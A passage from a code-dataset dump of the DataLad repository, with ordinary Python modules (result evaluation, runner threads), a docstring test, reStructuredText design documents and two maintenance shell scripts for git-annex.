'_eval_results', False)\n\n\ndef eval_results(wrapped):\n \"\"\"Decorator for return value evaluation of datalad commands.\n\n Note, this decorator is only compatible with commands that return\n status dict sequences!\n\n Two basic modes of operation are supported: 1) \"generator mode\" that\n `yields` individual results, and 2) \"list mode\" that returns a sequence of\n results. The behavior can be selected via the kwarg `return_type`.\n Default is \"list mode\".\n\n This decorator implements common functionality for result rendering/output,\n error detection/handling, and logging.\n\n Result rendering/output configured via the `result_renderer` keyword\n argument of each decorated command. 
Supported modes are: 'generic' (a\n generic renderer producing one line per result with key info like action,\n status, path, and an optional message); 'json' (a complete JSON line\n serialization of the full result record), 'json_pp' (like 'json', but\n pretty-printed spanning multiple lines), 'tailored' custom output\n formatting provided by each command class (if any), or 'disabled' for\n no result rendering.\n\n Error detection works by inspecting the `status` item of all result\n dictionaries. Any occurrence of a status other than 'ok' or 'notneeded'\n will cause an IncompleteResultsError exception to be raised that carries\n the failed actions' status dictionaries in its `failed` attribute.\n\n Status messages will be logged automatically, by default the following\n association of result status and log channel will be used: 'ok' (debug),\n 'notneeded' (debug), 'impossible' (warning), 'error' (error). Logger\n instances included in the results are used to capture the origin of a\n status report.\n\n Parameters\n ----------\n func: function\n __call__ method of a subclass of Interface,\n i.e. a datalad command definition\n \"\"\"\n\n @wraps(wrapped)\n def eval_func(*args, **kwargs):\n lgr.log(2, \"Entered eval_func for %s\", wrapped)\n # determine the command class associated with `wrapped`\n wrapped_class = get_wrapped_class(wrapped)\n\n # retrieve common options from kwargs, and fall back on the command\n # class attributes, or general defaults if needed\n kwargs = kwargs.copy() # we will pop, which might cause side-effect\n common_params = {\n p_name: kwargs.pop(\n # go with any explicitly given default\n p_name,\n # otherwise determine the command class and pull any\n # default set in that class\n getattr(wrapped_class, p_name))\n for p_name in eval_params}\n\n # short cuts and configured setup for common options\n return_type = common_params['return_type']\n\n if return_type == 'generator':\n # hand over the generator\n lgr.log(2,\n \"Returning generator_func from eval_func for %s\",\n wrapped_class)\n return _execute_command_(\n interface=wrapped_class,\n cmd=wrapped,\n cmd_args=args,\n cmd_kwargs=kwargs,\n exec_kwargs=common_params,\n )\n else:\n @wraps(_execute_command_)\n def return_func(*args_, **kwargs_):\n results = _execute_command_(\n interface=wrapped_class,\n cmd=wrapped,\n cmd_args=args,\n cmd_kwargs=kwargs,\n exec_kwargs=common_params,\n )\n if inspect.isgenerator(results):\n # unwind generator if there is one, this actually runs\n # any processing\n results = list(results)\n if return_type == 'item-or-list' and \\\n len(results) < 2:\n return results[0] if results else None\n else:\n return results\n\n lgr.log(2,\n \"Returning return_func from eval_func for %s\",\n wrapped_class)\n return return_func(*args, **kwargs)\n\n ret = eval_func\n ret._eval_results = True\n return ret\n\n\ndef _execute_command_(\n *,\n interface: anInterface,\n cmd: Callable[..., Generator[Dict, None, None]],\n cmd_args: tuple,\n cmd_kwargs: Dict,\n exec_kwargs: Dict,\n) -> Generator[Dict, None, None]:\n \"\"\"Internal helper to drive a command execution generator-style\n\n Parameters\n ----------\n interface:\n Interface class of associated with the `cmd` callable\n cmd:\n A DataLad command implementation. 
Typically the `__call__()` of\n the given `interface`.\n cmd_args:\n Positional arguments for `cmd`.\n cmd_kwargs:\n Keyword arguments for `cmd`.\n exec_kwargs:\n Keyword argument affecting the result handling.\n See `datalad.interface.common_opts.eval_params`.\n \"\"\"\n # for result filters and validation\n # we need to produce a dict with argname/argvalue pairs for all args\n # incl. defaults and args given as positionals\n allkwargs = get_allargs_as_kwargs(\n cmd,\n cmd_args,\n {**cmd_kwargs, **exec_kwargs},\n )\n\n # validate the complete parameterization\n _validate_cmd_call(interface, allkwargs)\n\n # look for potential override of logging behavior\n result_log_level = dlcfg.get('datalad.log.result-level', 'debug')\n # resolve string labels for transformers too\n result_xfm = known_result_xfms.get(\n allkwargs['result_xfm'],\n # use verbatim, if not a known label\n allkwargs['result_xfm'])\n result_filter = get_result_filter(allkwargs['result_filter'])\n result_renderer = allkwargs['result_renderer']\n if result_renderer == 'tailored' and not hasattr(interface,\n 'custom_result_renderer'):\n # a tailored result renderer is requested, but the class\n # does not provide any, fall back to the generic one\n result_renderer = 'generic'\n if result_renderer == 'default':\n # standardize on the new name 'generic' to avoid more complex\n # checking below\n result_renderer = 'generic'\n\n # figure out which hooks are relevant for this command execution\n # query cfg for defaults\n # .is_installed and .config can be costly, so ensure we do\n # it only once. See https://github.com/datalad/datalad/issues/3575\n dataset_arg = allkwargs.get('dataset', None)\n ds = None\n if dataset_arg is not None:\n from datalad.distribution.dataset import Dataset\n if isinstance(dataset_arg, Dataset):\n ds = dataset_arg\n else:\n try:\n ds = Dataset(dataset_arg)\n except ValueError:\n pass\n # look for hooks\n hooks = get_jsonhooks_from_config(ds.config if ds else dlcfg)\n # end of hooks discovery\n\n # flag whether to raise an exception\n incomplete_results = []\n # track what actions were performed how many times\n action_summary = {}\n\n # if a custom summary is to be provided, collect the results\n # of the command execution\n results = []\n do_custom_result_summary = result_renderer in (\n 'tailored', 'generic', 'default') and hasattr(\n interface,\n 'custom_result_summary_renderer')\n pass_summary = do_custom_result_summary \\\n and getattr(interface,\n 'custom_result_summary_renderer_pass_summary',\n None)\n\n # process main results\n for r in _process_results(\n # execution\n cmd(*cmd_args, **cmd_kwargs),\n interface,\n allkwargs['on_failure'],\n # bookkeeping\n action_summary,\n incomplete_results,\n # communication\n result_renderer,\n result_log_level,\n # let renderers get to see how a command was called\n allkwargs):\n for hook, spec in hooks.items():\n # run the hooks before we yield the result\n # this ensures that they are executed before\n # a potentially wrapper command gets to act\n # on them\n if match_jsonhook2result(hook, r, spec['match']):\n lgr.debug('Result %s matches hook %s', r, hook)\n # a hook is also a command that yields results\n # so yield them outside too\n # users need to pay attention to void infinite\n # loops, i.e. 
when a hook yields a result that\n # triggers that same hook again\n for hr in run_jsonhook(hook, spec, r, dataset_arg):\n # apply same logic as for main results, otherwise\n # any filters would only tackle the primary results\n # and a mixture of return values could happen\n if not keep_result(hr, result_filter, **allkwargs):\n continue\n hr = xfm_result(hr, result_xfm)\n # rationale for conditional is a few lines down\n if hr:\n yield hr\n if not keep_result(r, result_filter, **allkwargs):\n continue\n r = xfm_result(r, result_xfm)\n # in case the result_xfm decided to not give us anything\n # exclude it from the results. There is no particular reason\n # to do so other than that it was established behavior when\n # this comment was written. This will not affect any real\n # result record\n if r:\n yield r\n\n # collect if summary is desired\n if do_custom_result_summary:\n results.append(r)\n\n # result summary before a potential exception\n # custom first\n if do_custom_result_summary:\n if pass_summary:\n summary_args = (results, action_summary)\n else:\n summary_args = (results,)\n interface.custom_result_summary_renderer(*summary_args)\n elif result_renderer in ('generic', 'default') \\\n and action_summary \\\n and sum(sum(s.values())\n for s in action_summary.values()) > 1:\n # give a summary in generic mode, when there was more than one\n # action performed\n render_action_summary(action_summary)\n\n if incomplete_results:\n raise IncompleteResultsError(\n failed=incomplete_results,\n msg=\"Command did not complete successfully\")\n\n\ndef _validate_cmd_call(interface: anInterface, kwargs: Dict) -> None:\n \"\"\"Validate a parameterization of a command call\n\n This is called by `_execute_command_()` before a command call, with\n the respective Interface sub-type of the command, and all its\n arguments in keyword argument dict style. This dict also includes\n the default values for any parameter that was not explicitly included\n in the command call.\n\n This expected behavior is to raise an exception whenever an invalid\n parameterization is encountered.\n\n This default implementation performs no validation.\n \"\"\"\n pass\n" }, { "alpha_fraction": 0.7572148442268372, "alphanum_fraction": 0.7572148442268372, "avg_line_length": 34.78688430786133, "blob_id": "fd748ab0f648334dc2bd60209ac38a35d81c7e3c", "content_id": "7857be225537cb048b57341c2b17ad2da01eeea4", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2183, "license_type": "permissive", "max_line_length": 77, "num_lines": 61, "path": "/docs/config-format.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "Config file format\n==================\n\nIncludes\n--------\n\n:mod:`~datalad.config` enhances class:`~ConfigParser.SafeConfigParser`\nto also support includes. It makes it possible to specify within the\n`INCLUDES` section of the config file which other config file should\nbe considered before or after a currently read config file::\n\n [INCLUDES]\n before = defaults.cfg\n after = customizations.cfg\n\n [DEFAULTS]\n ....\n\nSections\n--------\n\nDownload section\n~~~~~~~~~~~~~~~~\n\nIt is the only type of a section at this point. It specifies a single\nresource which crawl/monitor and fetch specified content to be\ndeposited into the git/git-annex repository. 
Following fields are\nknown and could either be specified in the specific section or in\n`DEFAULT` section to be reused across different sections\n\nmode\n Could be `download`, `fast` or `relaxed`. In `download` mode files\n are downloaded, and added to the git-annex, thus based on a checksum\n backend. `fast` and `relaxed` modes correspond to the modes of `git\n annex addurl`\nincoming\n Path to the `incoming` repository -- where everything gets initially\n imported, e.g. original archives. If no archives to be extracted,\n it usually then matches with `public`. Original idea for such a\n separation was to cover the cases where incoming materials\n (archives) might contain some non-distributable materials which\n should be stripped before being placed into `public` repository\npublic\n Path to the `public` repository which is the target repository to be\n shared\ndescription\n Textual description to be placed under :file:`.git/description`\ninclude_href\n Regular expression to specify which URLs, pointed to by HTML `<A>`\n should be considered to be added to the repository\ninclude_href_a\n Regular expression to specify which links with matching text should\n be considered\nexclude_href, exclude_href_a\n Similar setups to specify which ones to exclude (e.g. if `include_href=.*`)\nrecurse\n Regular expression to specify which URLs to consider for further\n traversal while crawling the website\n\nTODO. Some additional documentation is currently within\n:meth:`datalad.config.EnhancedConfigParser.get_default`\n" }, { "alpha_fraction": 0.6086508631706238, "alphanum_fraction": 0.6104531288146973, "avg_line_length": 30.07200050354004, "blob_id": "abc0ae52d01f7c87f0d35b1afd4e75636e0436f3", "content_id": "7dda2fab5f93dbcb0dc83db262aa777eee7ccd67", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3884, "license_type": "permissive", "max_line_length": 87, "num_lines": 125, "path": "/datalad/interface/tests/test_docs.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for interface doc wranglers.\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom datalad.interface.base import (\n alter_interface_docs_for_api,\n dedent_docstring,\n)\nfrom datalad.tests.utils_pytest import (\n assert_false,\n assert_in,\n assert_not_in,\n)\n\ndemo_doc = \"\"\"\\\n Bla bla summary\n\n Generic intro blurb. Ping pong ping pong ping pong ping pong. Ping pong ping\n pong ping pong ping pong. Ping pong ping pong ping pong ping pong. Ping pong\n ping pong ping pong ping pong. Ping pong ping pong ping pong ping pong. Ping\n pong ping pong ping pong ping pong.\n\n || CMDLINE >>\n || REFLOW >>\n Something for the cmdline only\n Multiline!\n << REFLOW ||\n << CMDLINE ||\n\n || REFLOW >>\n a\n b\n << REFLOW ||\n not\n reflowed\n || REFLOW >>\n c\n << REFLOW ||\n\n || PYTHON >>\n\n || REFLOW >>\n Some Python-only bits\n Multiline!\n << REFLOW ||\n\n << PYTHON ||\n\n And an example for in-line markup: [PY: just for Python PY] and\n the other one [CMD: just for the command line CMD]. 
[PY: multiline\n python-only with [ brackets [] ] PY][CMD: multiline cli-only with [ brackets\n [] ] CMD]. End of demo.\n\n Generic appendix. Ding dong ding dong ding dong. Ding dong ding dong ding\n dong. Ding dong ding dong ding dong. Ding dong ding dong ding dong. Ding\n dong ding dong ding dong.\n\n\"\"\"\n\ndemo_paramdoc = \"\"\"\\\n\n Parameters\n ----------\n dataset : Dataset or None, optional\n something [PY: python only PY] in between [CMD: cmdline only CMD] appended\n Brackets can also be within and we can deal with [PY: multiline\n python-only with [ some brackets [] PY] [CMD: multiline cli-only [\n brackets included [ can we also have || ?] CMD].\n dataset is given, an attempt is made to identify the dataset based\n Dataset (e.g. a path), or value must be `None`. [Default: None]\n\"\"\"\n\ndemo_argdoc = \"\"\"\\\n specify the dataset to perform the install operation\n on. If no dataset is given, an attempt is made to\n identify the dataset based on the current working\n directory and/or the `path` given. Constraints: Value\n must be a Dataset or a valid identifier of a Dataset\n (e.g. a path), or value must be `None`. [Default:\n None]\n\"\"\"\n\n\ndef test_dedent():\n assert_false(dedent_docstring(\"one liner\").endswith(\"\\n\"))\n\n\ndef test_alter_interface_docs_for_api():\n alt = alter_interface_docs_for_api(demo_doc)\n alt_l = alt.split('\\n')\n # de-dented\n assert_false(alt_l[0].startswith(' '))\n assert_false(alt_l[-1].startswith(' '))\n assert_not_in('CMD', alt)\n assert_not_in('PY', alt)\n assert_not_in('REFLOW', alt)\n assert_in('a b', alt)\n assert_in('not\\n reflowed', alt)\n assert_in(\"Some Python-only bits Multiline!\", alt)\n assert_in(\"Some Python-only bits\", alt)\n assert_in(\"just for Python\", alt)\n assert_not_in(\"just for the command line\", alt)\n assert_not_in(\"multiline cli-only with [ brackets\\n[] ]\", alt)\n assert_in(\"multiline\\npython-only with [ brackets [] ]\", alt)\n\n altpd = alter_interface_docs_for_api(demo_paramdoc)\n assert_not_in(\"PY\", altpd)\n assert_not_in(\"CMD\", altpd)\n assert_in('python', altpd)\n assert_in('in between', altpd)\n assert_in('appended', altpd)\n assert_in(\"multiline\\n python-only with [ some brackets []\", altpd)\n assert_not_in('cmdline', altpd)\n assert_not_in(\"multiline cli-only [\\n brackets included \"\n \"[ can we also have || ?]\", altpd)\n" }, { "alpha_fraction": 0.634854793548584, "alphanum_fraction": 0.6514523029327393, "avg_line_length": 25.77777862548828, "blob_id": "9721f57a9a585cb7efdceedf43c608ed057402bb", "content_id": "180e32f1f5783ca07599f08ba55c0ba27ab73f3c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 241, "license_type": "permissive", "max_line_length": 64, "num_lines": 9, "path": "/tools/bisect-git-annex.scripts/bisect-git-annex-doublepasswd.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\nset -eu\n\nerr=\"thread blocked indefinitely\"\n\ncd ~/QA\n# script doesn't work in a script since probably no tty\ntimeout 10 script -f -c 'git annex get -J2 sub-*' || :\ntest 1 -eq `sed -e 's, ,\\n,g' typescript | grep -c 'password:' `\n" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6068181991577148, "avg_line_length": 27.387096405029297, "blob_id": "9a8cba925d0622b51912cbf98a307521498c2182", "content_id": "fec42f32c500b7a4b29b65b617c0ce343b6a09ca", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": 
"Shell", "length_bytes": 880, "license_type": "permissive", "max_line_length": 64, "num_lines": 31, "path": "/tools/convert-git-annex-layout", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -eu\n\nto=\"$1\"\n\necho \"Initial fsck:\"\ngit annex fsck --fast 2>&1 | python -m tqdm --null\necho \"Going through objects: \"\nfor f in .git/annex/objects/*/*/*; do\n key=$(basename $f)\n keydir=$(dirname $f)\n newhashdir=$(git annex examinekey --format=\"\\${$to}\" \"$key\")\n targetdir=\".git/annex/objects/$newhashdir\"\n test -n \"$newhashdir\"\n if [ \"$keydir\" = \"${targetdir%/}\" ]; then\n continue\n fi\n echo \" $f -> $newhashdir\"\n # This was a wrong assumption - there could be multiple\n # keys in the same directory so we might have it already.\n # But I still feel we might need some test here\n #if test -e \"$targetdir\"; then\n # echo \"$targetdir already exists\"\n # exit 1\n #fi\n mkdir -p \"$(dirname $targetdir)\"\n mv \"$keydir\" \"${targetdir%/}\"\ndone\necho \"Final fsck:\"\ngit annex fsck --fast 2>&1 | python -m tqdm --null\n" }, { "alpha_fraction": 0.7210769653320312, "alphanum_fraction": 0.7269667387008667, "avg_line_length": 45.6274528503418, "blob_id": "e2efe806cd704b056b81bfc6bbe2594e25801d91", "content_id": "9ba1161e4fc4d2071212f6af8a0fe14600956792", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2377, "license_type": "permissive", "max_line_length": 117, "num_lines": 51, "path": "/docs/source/design/pos_vs_kw_parameters.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_pos_vs_kw_parameters:\n\n********************************\nPositional vs Keyword parameters\n********************************\n\n.. 
topic:: Specification scope and status\n\n This specification is a proposal, subject to review and further discussion.\n Technical preview was implemented in the `PR #6176 <https://github.com/datalad/datalad/pull/6176>`_.\n\nMotivation\n==========\n\nPython allows for keyword arguments (arguments with default values) to be specified positionally.\nThat complicates addition or removal of new keyword arguments since such changes must account for their possible\npositional use.\nMoreover, in case of our Interface's, it contributes to inhomogeneity since when used in :term:`CLI`, all keyword\narguments\nmust be specified via non-positional ``--<option>``'s, whenever Python interface allows for them to be used\npositionally.\n\nPython 3 added possibility to use a ``*`` separator in the function definition to mandate that all keyword arguments\n*after* it must be be used only via keyword (``<option>=<value>``) specification.\nIt is encouraged to use ``*`` to explicitly separate out positional from keyword arguments in majority of the cases,\nand below we outline two major types of constructs.\n\nInterfaces\n==========\n\nSubclasses of the :class:`~datalad.interface.base.Interface` provide specification and implementation for both\n:term:`CLI` and Python API interfaces.\nAll new interfaces must separate all CLI ``--options`` from positional arguments using ``*`` in their ``__call__``\nsignature.\n\n**Note:** that some positional arguments could still be optional (e.g., destination ``path`` for ``clone``),\nand thus should be listed **before** ``*``, despite been defined as a keyword argument in the ``__call__`` signature.\n\nA unit-test will be provided to guarantee such consistency between :term:`CLI` and Python interfaces.\nOverall, exceptions to this rule could be only some old(er) interfaces.\n\nRegular functions and methods\n=============================\n\nUse of ``*`` is encouraged for any function (or method) with keyword arguments.\nGenerally, ``*`` should come before the first keyword argument, but similarly to the Interfaces above, it is left to\nthe discretion of the developer to possibly allocate some (just few) arguments which could be used positionally if\nspecified." 
}, { "alpha_fraction": 0.54513019323349, "alphanum_fraction": 0.545923113822937, "avg_line_length": 28.443580627441406, "blob_id": "39bba393fb5c6638204e60b245c3772f147b3651", "content_id": "8b11e3fe4bc62257ce7bd3635770d3a187ef78ad", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7567, "license_type": "permissive", "max_line_length": 82, "num_lines": 257, "path": "/datalad/runner/runnerthreads.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from __future__ import annotations\n\nimport logging\nimport os\nimport threading\nfrom abc import (\n ABCMeta,\n abstractmethod,\n)\nfrom enum import Enum\nfrom queue import (\n Full,\n Queue,\n)\nfrom subprocess import Popen\nfrom typing import (\n IO,\n Any,\n Optional,\n)\n\nfrom datalad.utils import COPY_BUFSIZE\n\nlgr = logging.getLogger(\"datalad.runner.runnerthreads\")\n\n\ndef _try_close(file_object: Optional[IO]) -> None:\n if file_object is not None:\n try:\n file_object.close()\n except OSError:\n pass\n\n\nclass IOState(Enum):\n ok = \"ok\"\n process_exit = \"process_exit\"\n\n\nclass SignalingThread(threading.Thread):\n def __init__(self,\n identifier: str,\n signal_queues: list[Queue[tuple[Any, IOState, Optional[bytes]]]]\n ) -> None:\n\n super().__init__(daemon=True)\n self.identifier = identifier\n self.signal_queues = signal_queues\n\n def __repr__(self) -> str:\n return f\"Thread<{self.identifier}>\"\n\n def __str__(self) -> str:\n return self.__repr__()\n\n def signal(self,\n content: tuple[Any, IOState, Optional[bytes]]\n ) -> bool:\n error_occurred = False\n for signal_queue in self.signal_queues:\n try:\n signal_queue.put(content, block=True, timeout=.1)\n except Full:\n lgr.debug(\"timeout while trying to signal: %s\", content)\n error_occurred = True\n return not error_occurred\n\n\nclass WaitThread(SignalingThread):\n \"\"\"\n Instances of this thread wait for a process to exit and enqueue\n an exit event in the signal queues.\n \"\"\"\n def __init__(self,\n identifier: str,\n signal_queues: list[Queue[tuple[Any, IOState, Optional[bytes]]]],\n process: Popen\n ) -> None:\n super().__init__(identifier, signal_queues)\n self.process = process\n\n def run(self) -> None:\n\n lgr.log(5, \"%s (%s) started\", self.identifier, self)\n\n self.process.wait()\n self.signal((self.identifier, IOState.process_exit, None))\n\n lgr.log(5, \"%s (%s) exiting\", self.identifier, self)\n\n\nclass ExitingThread(SignalingThread):\n def __init__(self,\n identifier: str,\n signal_queues: list[Queue[tuple[Any, IOState, Optional[bytes]]]]\n ) -> None:\n\n super().__init__(identifier, signal_queues)\n self.exit_requested = False\n\n def request_exit(self) -> None:\n \"\"\"\n Request the thread to exit. This is not guaranteed to\n have any effect, because the instance has to check for\n self.exit_requested and act accordingly. 
It might not\n do that.\n \"\"\"\n self.exit_requested = True\n\n\nclass TransportThread(ExitingThread, metaclass=ABCMeta):\n def __init__(self,\n identifier: str,\n signal_queues: list[Queue[tuple[Any, IOState, Optional[bytes]]]],\n user_info: Any\n ) -> None:\n\n super().__init__(identifier, signal_queues)\n self.user_info = user_info\n\n def __repr__(self) -> str:\n return f\"Thread<({self.identifier}, {self.user_info})>\"\n\n def __str__(self) -> str:\n return self.__repr__()\n\n def signal_event(self,\n state: IOState,\n data: Optional[bytes]\n ) -> bool:\n return self.signal((self.user_info, state, data))\n\n @abstractmethod\n def read(self) -> Optional[bytes]:\n \"\"\"\n Read data from source return None, if source is close,\n or destination close is required.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def write(self,\n data: bytes\n ) -> bool:\n \"\"\"\n Write given data to destination, return True if data is\n written successfully, False otherwise.\n \"\"\"\n raise NotImplementedError\n\n def run(self) -> None:\n\n lgr.log(5, \"%s (%s) started\", self.identifier, self)\n\n # Copy data from source queue to destination queue\n # until exit is requested. If timeouts arise, signal\n # them to the receiver via the signal queue.\n data: Optional[bytes] = b\"\"\n while not self.exit_requested:\n\n data = self.read()\n # If the source sends None-data it wants\n # us to exit the thread. Signal this to\n # the downstream queues (which might or might\n # not be contain the output queue),\n # and exit the thread.\n if data is None:\n break\n\n if self.exit_requested:\n break\n\n succeeded = self.write(data)\n if not succeeded:\n break\n\n self.signal_event(IOState.ok, None)\n lgr.log(\n 5,\n \"%s (%s) exiting (exit_requested: %s, last data: %s)\",\n self.identifier,\n self,\n self.exit_requested, data)\n\n\nclass ReadThread(TransportThread):\n def __init__(self,\n identifier: str,\n signal_queues: list[Queue[tuple[Any, IOState, Optional[bytes]]]],\n user_info: Any,\n source: IO,\n destination_queue: Queue[tuple[Any, IOState, bytes]],\n length: int = COPY_BUFSIZE\n ) -> None:\n\n super().__init__(identifier, signal_queues, user_info)\n self.source = source\n self.destination_queue = destination_queue\n self.length = length\n\n def read(self) -> Optional[bytes]:\n try:\n data = os.read(self.source.fileno(), self.length)\n except (ValueError, OSError):\n # The destination was most likely closed, nevertheless,\n # try to close it and indicate EOF.\n _try_close(self.source)\n return None\n return data or None\n\n def write(self,\n data: bytes\n ) -> bool:\n\n # We write to an unlimited queue, no need for timeout checking.\n self.destination_queue.put((self.user_info, IOState.ok, data))\n return True\n\n\nclass WriteThread(TransportThread):\n def __init__(self,\n identifier: str,\n signal_queues: list[Queue[tuple[Any, IOState, Optional[bytes]]]],\n user_info: Any,\n source_queue: Queue[Optional[bytes]],\n destination: IO\n ) -> None:\n\n super().__init__(identifier, signal_queues, user_info)\n self.source_queue = source_queue\n self.destination = destination\n\n def read(self) -> Optional[bytes]:\n data = self.source_queue.get()\n if data is None:\n # Close stdin file descriptor here, since we know that no more\n # data will be sent to stdin.\n _try_close(self.destination)\n return data\n\n def write(self,\n data: bytes,\n ) -> bool:\n try:\n written = 0\n while written < len(data):\n written += os.write(\n self.destination.fileno(),\n data[written:])\n if self.exit_requested:\n 
return written == len(data)\n except (BrokenPipeError, OSError, ValueError):\n # The destination was most likely closed, nevertheless,\n # try to close it and indicate EOF.\n _try_close(self.destination)\n return False\n return True\n" }, { "alpha_fraction": 0.7488971948623657, "alphanum_fraction": 0.7697658538818359, "avg_line_length": 46.15999984741211, "blob_id": "45c86625701b49397391a61555edcd82a15234ac", "content_id": "eda104eaa60a1968a0a91736a1336e040895eca0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5894, "license_type": "permissive", "max_line_length": 143, "num_lines": 125, "path": "/docs/source/design/user_messaging.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_user_messaging:\n\n*******************************************************\nUser messaging: result records vs exceptions vs logging\n*******************************************************\n\n.. topic:: Specification scope and status\n\n This specification provides a partial overview of the implementation goal.\n\nMotivation\n==========\n\nThis specification delineates the applicable contexts for using\n:ref:`result records <chap_design_result_records>`, :ref:`exceptions <chap_design_exception_handling>`,\n:ref:`progress reporting <chap_design_progress_reporting>`, specific :ref:`log levels <chap_design_log_levels>`,\nor other types of user messaging processes.\n\n\nSpecification\n=============\n\nResult records\n--------------\n\n**Result records are the only return value format** for all DataLad interfaces.\n\nContrasting with classic Python interfaces that return specific non-annotated values,\nDataLad interfaces (i.e. subclasses of :py:class:`datalad.interface.base.Interface`)\nimplement message passing by yielding :ref:`result records <chap_design_result_records>`\nthat are associated with individual operations. Result records are routinely inspected throughout\nthe code base and their annotations are used to inform general program flow and error handling.\n\nDataLad interface calls can include an ``on_failure`` parameterization to specify how to\nproceed with a particular operation if a returned result record is\n:ref:`classified as a failure result <target-result-status>`. DataLad interface calls can\nalso include a ``result_renderer`` parameterization to explicitly enable or\ndisable the rendering of result records.\n\nDevelopers should be aware that external callers will use DataLad interface call parameterizations\nthat can selectively ignore or act on result records, and that the process should therefore\nyield meaningful result records. If, in turn, the process itself receives a set of result\nrecords from a sub-process, these should be inspected individually in order to identify result\nvalues that could require re-annotation or status re-classification.\n\nFor user messaging purposes, result records can also be enriched with additional human-readable\ninformation on the nature of the result, via the ``message`` key, and human-readable hints to\nthe user, via the ``hints`` key. Both of these are rendered via the `UI Module`_.\n\n\nException handling\n------------------\n\nIn general, **exceptions should be raised when there is no way to ignore or recover from\nthe offending action**.\n\nMore specifically, raise an exception when:\n\n1. A DataLad interface's parameter specifications are violated\n2. 
An additional requirement (beyond parameters) for the meaningful continuation of a\n DataLad interface, function, or process is not met\n\nIt must be made clear to the user/caller what the exact cause of the exception\nis, given the context within which the user/caller triggered the action.\nThis is achieved directly via a (re)raised exception, as opposed to logging messages or\nresults records which could be ignored or unseen by the user.\n\n.. note::\n In the case of a complex set of dependent actions it could be expensive to\n confirm parameter violations. In such cases, initial sub-routines might already generate\n result records that have to be inspected by the caller, and it could be practically better\n to yield a result record (with ``status=[error|impossible]``) to communicate the failure.\n It would then be up to the upstream caller to decide whether to specify\n ``on_failure='ignore'`` or whether to inspect individual result records and turn them\n into exceptions or not.\n\n\nLogging\n-------\n\nLogging provides developers with additional means to describe steps in a process,\nso as to **allow insight into the program flow during debugging** or analysis of e.g.\nusage patterns. Logging can be turned off externally, filtered, and redirected. Apart from\nthe :ref:`log-level <chap_design_log_levels>` and message, it is not inspectable and\ncannot be used to control the logic or flow of a program.\n\nImportantly, logging should not be the primary user messaging method for command outcomes,\nTherefore:\n\n1. No interface should rely solely on logging for user communication\n2. Use logging for in-progress user communication via the mechanism for :ref:`progress reporting <chap_design_progress_reporting>`\n3. Use logging to inform debugging processes\n\n\nUI Module\n---------\n\nThe :mod:`~datalad.ui` module provides the means to communicate information\nto the user in a user-interface-specific manner, e.g. via a console, dialog, or an iPython interface.\nInternally, all DataLad results processed by the result renderer are passed through the UI module.\n\nTherefore: unless the criteria for logging apply, and unless the message to be delivered to the user\nis specified via the ``message`` key of a result record, developers should let explicit user communication\nhappen through the UI module as it provides the flexibility to adjust to the present UI.\nSpecifically, :py:func:`datalad.ui.message` allows passing a simple message via the UI module.\n\n\nExamples\n========\n\nThe following links point to actual code implementations of the respective user\nmessaging methods:\n\n- `Result yielding`_\n- `Exception handling`_\n- `Logging`_\n- `UI messaging`_\n\n.. _Result yielding: https://github.com/datalad/datalad/blob/a8d7c63b763aacfbca15925bb1562a62b4448ea6/datalad/core/local/status.py#L402-L426\n.. _Exception handling: https://github.com/datalad/datalad/blob/a8d7c63b763aacfbca15925bb1562a62b4448ea6/datalad/core/local/status.py#L149-L150\n.. _Logging: https://github.com/datalad/datalad/blob/a8d7c63b763aacfbca15925bb1562a62b4448ea6/datalad/core/local/status.py#L158\n.. 
